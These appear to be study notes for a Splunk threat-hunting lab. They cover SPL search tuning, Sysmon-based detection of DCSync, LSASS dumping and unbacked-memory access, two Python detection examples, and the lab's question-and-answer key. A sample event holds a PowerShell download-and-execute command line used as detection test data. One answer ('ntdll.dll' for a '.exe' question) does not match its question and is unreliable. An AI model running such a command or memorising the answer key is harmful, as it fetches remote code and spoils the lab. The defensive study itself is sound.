Intrusion Detection with Splunk
Last updated
The most important thing at the beginning is to lower the volume of logs a search has to read.
Two queries can take very different amounts of time to run even though they return exactly the same events. If one query specifies the Security log as the source together with an EventCode that only occurs in Security logs, and another query specifies only the EventCode and not the source, both return the same result. In the first case Splunk knows where to look, while in the second it scans every log source before filtering, so the query takes longer to return its result.
Three ways to search for all possible instances of uniwaldo.local:
- by Computer Name (the ComputerName field);
- using wildcards across all fields (takes more time);
- using wildcards in the ComputerName field.
The wildcard search across all fields takes a long time because Splunk has to check uniwaldo.local as a value of every field. We know it is a computer name, so we can make the search easier for Splunk by specifying the field.
- Sysmon Event Codes provide detailed logging of system activities, useful for detecting anomalies.
- Parent-Child Process Relationships can reveal malicious execution chains (e.g., notepad.exe spawning powershell.exe).
- DCSync Attack Detection involves monitoring Active Directory replication events (EventCode=4662 with Access_Mask=0x100).
- LSASS Dumping can be detected using EventCode=10 (Process Access) targeting lsass.exe.
Efficient Searching in Splunk involves:
- Filtering by sourcetype and EventCode to reduce search time.
- Using wildcards (*) carefully to avoid performance issues.
- Specifying fields (e.g., ComputerName) instead of raw text searches.
Purpose of each hunting search:
- Identifies which Sysmon events are logged in the environment.
- Lists all process creation events with parent-child relationships.
- Process creation filtered to cmd.exe and powershell.exe: focuses on suspicious execution chains.
- notepad.exe spawning powershell.exe: a suspicious execution chain.
- Events mentioning 10.0.0.229: identifies all logs related to the suspicious IP.
- Events from waldo-virtual-machine: checks if the Linux system is involved in malicious activity.
- Lists commands executed on Windows hosts from the suspicious IP.
- Identifies potential DCSync attempts (replication of AD secrets).
- Lists processes accessing lsass.exe (common in credential dumping).
- notepad.exe accessing LSASS: checks if Notepad is being used to dump credentials (highly suspicious).
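The hunting steps above, run as plain filtering logic over a handful of constructed events. This is an added example, not SPL from the original notes: EVENTS is built by hand to mimic Sysmon EventCode 1/3/10 and Windows Security EventCode 4662 records with the field names Splunk extracts from them (ParentImage, Image, SourceImage, TargetImage, Access_Mask, Properties); hostnames, users and paths are assumed. The DCSync check goes one step beyond the notes' Access_Mask=0x100 filter: it also requires the DS-Replication-Get-Changes property GUIDs and ignores machine accounts, because 0x100 on its own fires for a lot of ordinary directory access.

```python
"""Hunting steps from the notes, applied to constructed sample events (added example)."""
from collections import Counter

SUSPICIOUS_IP = "10.0.0.229"

# Property GUIDs for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.
# A real DCSync requests these; requiring them cuts 4662/0x100 noise (added refinement).
REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
)

SYSMON = "XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
SECURITY = "WinEventLog:Security"

EVENTS = [  # constructed records, not real telemetry
    {"sourcetype": SYSMON, "EventCode": 1, "ComputerName": "uniwaldo.local",
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"sourcetype": SYSMON, "EventCode": 1, "ComputerName": "uniwaldo.local",
     "ParentImage": r"C:\Windows\notepad.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://10.0.0.229/a')"},
    {"sourcetype": SYSMON, "EventCode": 1, "ComputerName": "uniwaldo.local",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami"},
    {"sourcetype": SYSMON, "EventCode": 3, "ComputerName": "uniwaldo.local",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "10.0.0.229", "DestinationPort": "80"},
    {"sourcetype": SYSMON, "EventCode": 10, "ComputerName": "uniwaldo.local",
     "SourceImage": r"C:\Windows\notepad.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"sourcetype": SYSMON, "EventCode": 10, "ComputerName": "uniwaldo.local",
     "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"sourcetype": SECURITY, "EventCode": 4662, "ComputerName": "dc01.uniwaldo.local",
     "Account_Name": "waldo", "Access_Mask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"sourcetype": SECURITY, "EventCode": 4662, "ComputerName": "dc01.uniwaldo.local",
     "Account_Name": "DC01$", "Access_Mask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},  # DC-to-DC replication
    {"sourcetype": SECURITY, "EventCode": 4662, "ComputerName": "dc01.uniwaldo.local",
     "Account_Name": "waldo", "Access_Mask": "0x100",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # unrelated property
]


def basename(path):
    """Last path component, lower-cased, so comparisons ignore directory and case."""
    return path.rsplit("\\", 1)[-1].lower()


def process_chains(events, parent, child):
    """Sysmon EventCode 1 records where `parent` spawned `child`."""
    return [e for e in events if e["EventCode"] == 1
            and basename(e["ParentImage"]) == parent.lower()
            and basename(e["Image"]) == child.lower()]


def related_to(events, value):
    """Records with `value` anywhere in any field: the search-everything approach the
    notes warn is slow in Splunk, but the right tool for tying one IP to every source."""
    return [e for e in events if any(value in str(v) for v in e.values())]


def lsass_access(events):
    """Count Sysmon EventCode 10 records by the process that opened lsass.exe."""
    return Counter(basename(e["SourceImage"]) for e in events
                   if e["EventCode"] == 10 and basename(e["TargetImage"]) == "lsass.exe")


def dcsync_candidates(events):
    """EventCode 4662 with control access (0x100) to a replication property by a
    non-machine account; machine accounts (names ending in $) replicate legitimately."""
    return [e for e in events if e["EventCode"] == 4662
            and e["Access_Mask"].lower() == "0x100"
            and not e["Account_Name"].endswith("$")
            and any(g in e["Properties"].lower() for g in REPLICATION_GUIDS)]


if __name__ == "__main__":
    for e in process_chains(EVENTS, "notepad.exe", "powershell.exe"):
        print("suspicious chain:", e["ParentImage"], "->", e["CommandLine"])
    print("events mentioning", SUSPICIOUS_IP, ":", len(related_to(EVENTS, SUSPICIOUS_IP)))
    print("lsass.exe accessed by:", dict(lsass_access(EVENTS)))
    for e in dcsync_candidates(EVENTS):
        print("possible DCSync by", e["Account_Name"], "on", e["ComputerName"])
```

The interesting output is the correlation: the notepad.exe to powershell.exe chain carries the same 10.0.0.229 address that later shows up as a network destination, and notepad.exe is also one of the two images that opened lsass.exe, which is exactly the attack chain the notes say to assemble from separate queries.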
Start Broad, Then Narrow Down
- Begin with general queries (e.g., all Sysmon events), then filter for anomalies.
Focus on High-Value EventCodes
- EventCode=1 (process creation), EventCode=10 (process access), and EventCode=4662 (AD replication) are critical for detecting intrusions.
Correlate Suspicious Activity
- Combine process anomalies (notepad.exe → powershell.exe) with network connections (10.0.0.229) to uncover attack chains.
Validate Findings
- Use additional queries (e.g., Access_Mask=0x100 for DCSync) to confirm malicious activity.
Optimize Searches
- Specify sourcetype and fields (e.g., ComputerName) to speed up queries.
Alerting vs. Hunting
- Alerting: proactive detection with low false positives.
- Hunting: exploratory analysis to uncover hidden threats.
- Goal: avoid alert fatigue by minimizing noise while catching real threats.
Detecting Malicious API Calls from UNKNOWN Memory Regions
- Shellcode often executes from unbacked memory, i.e. memory not backed by a module on disk, which appears as UNKNOWN in the Sysmon call trace.
- Legitimate processes (e.g., JIT compilers) may also trigger UNKNOWN calls (false positives).
Optimizing Alerts
- Exclude known benign processes (e.g., .NET, Explorer.exe, WOW64).
- Focus on high-risk behaviors (e.g., ProcessAccess with UNKNOWN call traces).
- Ensure resilience against evasion (e.g., attackers renaming DLLs to bypass filters).
Step 1. Purpose: find which EventCode logs contain suspicious memory calls. Observation: only EventCode=10 (Process Access) is relevant here.
Step 2. Purpose: identify processes making unbacked memory calls. Common false positives: .NET (JIT compilation); Electron apps (Squirrel.exe); WOW64 (Windows 32-bit emulation).
Step 3. Purpose: ignore processes accessing themselves (often benign).
Step 4. Purpose: remove noise from legitimate applications. Key exclusions: .NET (clr.dll, ni.dll); WOW64 (32-bit emulation); Explorer.exe (too noisy).
Step 5. Purpose: detect only suspicious process access from unbacked memory. Output: SourceImage (the accessing, possibly malicious, process), TargetImage (the process being accessed, e.g., lsass.exe), CallTrace (the full API call stack).
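The alert refinement from Optimizing Alerts and Steps 1 to 5 above, written out as a filter over constructed Sysmon EventCode 10 records. This is an added example, not the notes' own SPL. It assumes the Sysmon CallTrace format of module+offset frames separated by "|", with unbacked frames written as UNKNOWN(address), and the SourceImage/TargetImage/CallTrace field names; every path, address and process in EVENTS is made up. The resilience step is handled by excluding .NET and WOW64 frames only when the module lives under its normal Windows install directory, so a DLL renamed to clr.dll but loaded from a user-writable path still alerts.

```python
"""Alert filter for process access from unbacked (UNKNOWN) memory (added example)."""


def basename(path):
    """Last path component, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def is_benign_frame(frame):
    """A call-stack frame is excluded only when the module sits where Windows installs
    it. A DLL named clr.dll or wow64.dll loaded from elsewhere does not match."""
    module = frame.split("+", 1)[0].lower()
    dotnet = module.startswith("c:\\windows\\microsoft.net\\") and (
        module.endswith("\\clr.dll") or module.endswith(".ni.dll"))
    wow64 = module.startswith("c:\\windows\\system32\\wow64")
    return dotnet or wow64


def unknown_memory_alerts(events):
    """Return the EventCode 10 records that should alert, in input order."""
    alerts = []
    for e in events:
        if e.get("EventCode") != 10:                      # Step 1: Process Access only
            continue
        frames = e["CallTrace"].split("|")
        if not any(f.startswith("UNKNOWN") for f in frames):
            continue                                      # Step 2: needs an unbacked frame
        if e["SourceImage"].lower() == e["TargetImage"].lower():
            continue                                      # Step 3: self access
        if basename(e["SourceImage"]) == "explorer.exe":
            continue                                      # Step 4: too noisy
        if any(is_benign_frame(f) for f in frames):
            continue                                      # Step 4: JIT / WOW64 thunks
        alerts.append(e)                                  # Step 5: what is left
    return alerts


NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+9c534"
LSASS = r"C:\Windows\System32\lsass.exe"

EVENTS = [  # constructed records, not real telemetry
    {"EventCode": 10, "SourceImage": r"C:\Users\waldo\AppData\Local\Temp\update.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1010",
     "CallTrace": NTDLL + "|UNKNOWN(00000000025F1A30)"},                 # alert
    {"EventCode": 10, "SourceImage": r"C:\Program Files\App\App.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000",
     "CallTrace": NTDLL + r"|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll+1a2b3"
                  "|UNKNOWN(000001D3C8A0F000)"},                          # .NET JIT
    {"EventCode": 10, "SourceImage": r"C:\Program Files (x86)\Old\legacy.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000",
     "CallTrace": NTDLL + r"|C:\Windows\System32\wow64.dll+2e3f|UNKNOWN(0000000077A11C10)"},
    {"EventCode": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000",
     "CallTrace": NTDLL + "|UNKNOWN(00007FF6A1B20000)"},                 # explorer noise
    {"EventCode": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000",
     "CallTrace": NTDLL + "|UNKNOWN(00007FF6A1B30000)"},                 # self access
    {"EventCode": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000",
     "CallTrace": NTDLL + r"|C:\Program Files\Windows Defender\mpengine.dll+4c1f2"},
    {"EventCode": 10, "SourceImage": r"C:\Users\waldo\Desktop\inject.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1fffff",
     "CallTrace": NTDLL + r"|C:\Users\waldo\Desktop\clr.dll+1a2b3"
                  "|UNKNOWN(0000000002AB1F3A)"},                          # renamed DLL: alert
    {"EventCode": 1, "Image": r"C:\Windows\System32\cmd.exe"},            # wrong EventCode
]

if __name__ == "__main__":
    for e in unknown_memory_alerts(EVENTS):
        print(e["SourceImage"], "->", e["TargetImage"], "|", e["CallTrace"])
```

Two of the eight records survive: the Temp-directory binary touching lsass.exe from an UNKNOWN frame, and the injector whose stack contains a clr.dll that is not under C:\Windows\Microsoft.NET. Excluding on the bare module name, which is the tempting one-liner, would have let the second one through.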
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data the other process that dumped lsass. Enter its name as your answer. Answer format: _____.exe
Answer: ntdll.dll
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the method through which the other process dumped lsass. Enter the misused DLL's name as your answer. Answer format: ______.dll
Answer: comsvcs.dll
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: ______.exe
Answer: rundll32.exe
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX
Answer: 10.0.0.186 and 10.0.0.91
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the port that one of the two C2 callback server IPs used to connect to one of the compromised machines. Enter it as your answer.
Answer: 3389